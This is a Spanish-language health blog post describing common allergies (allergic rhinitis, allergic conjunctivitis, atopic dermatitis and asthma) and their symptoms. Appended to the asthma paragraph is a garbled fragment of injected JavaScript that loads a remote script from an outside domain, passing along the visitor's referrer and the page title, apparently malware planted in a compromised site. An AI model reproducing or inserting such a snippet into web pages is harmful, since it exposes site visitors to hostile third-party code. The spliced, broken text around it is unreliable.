Salud y belleza » Enfermedades, Salud

Las alergias más comunes

Sin Comentarios

En la ciencia de la Medicina, el término “común” tiene un escaso valor. Es decir, ¿a qué se puede llamar “común”? Solo es un juego de números, una estadística, una palabra de valor netamente cuantitativo.
Bien, de acuerdo a esas cifras he aquí un cuadro con algunas de las alergias no “más comunes” sino, mejor digamos, “más tratadas”.

alergias

- Rinitis alérgica: esta patología se caracteriza por una severa inflamación de la membrana mucosa que reviste la nariz. La rinitis es provocada habitualmente por la alergia al polen de las plantas, al polvo o a otras sustancias similares presentes en el aire. ¿Qué nos provoca la rinitis? Síntomas similares al de un resfriado pero más intensos como estornudos múltiples, picazón, moqueo, congestión nasal y dolor de cabeza.
En muchos casos la rinitis puede ser temporal (de acuerdo a la estación o a diferentes cambios climáticos) pero, a menudo, también puede producirse por factores específicos como la exposición a mascotas, hongos, etc.

- Conjuntivitis alérgica: esta enfermedad puede presentarse sola o asociada a otras patologías. La conjuntivitis se destaca por una inflamación en la zona ocular y los síntomas más comunes son lagrimeo, picazón, irritabilidad, enrojecimiento de la conjuntiva (la membrana interior de los ojos) y hasta hinchazón de párpados.

- Dermatitis atópica: también llamada comúnmente eccema, la dermatitis atópica es una enfermedad que básicamente consiste en un estado reaccional de la piel caracterizado por erupciones pruriginosas y con aspecto de escamas. Es un mal de complicado y  difícil tratamiento, bastante frecuente en la consulta normal del dermatólogo o del pediatra.

Los síntomas que presenta son el surgimiento de ampollas, picazón intensa, enrojecimiento o inflamación de la piel, erupción cutánea entre otros. Existen casos leves que pueden ser tratados de forma práctica y otros severos que requieren una atención especial.
La dermatitis atópica fue conocida desde un principio como “prúrigo de Besnier” pero actualmente también es llamada neurodermatitis.

- Asma: se trata de una clásica patología dada por, como en los casos anteriores, una inflamación con la salvedad de que en este caso todo ocurre en el aparato respiratorio. El asma provoca problemas en la respiración ya que, al padecerla, el aire pasa con dificultad a través de los bronquios. Esto causa en los afectados una tos irritativa y persistente, agitación, falta de aire, opresión en el pecho, hundimiento de las costillas al respirar y ruidos sibilantes.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; } else {

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.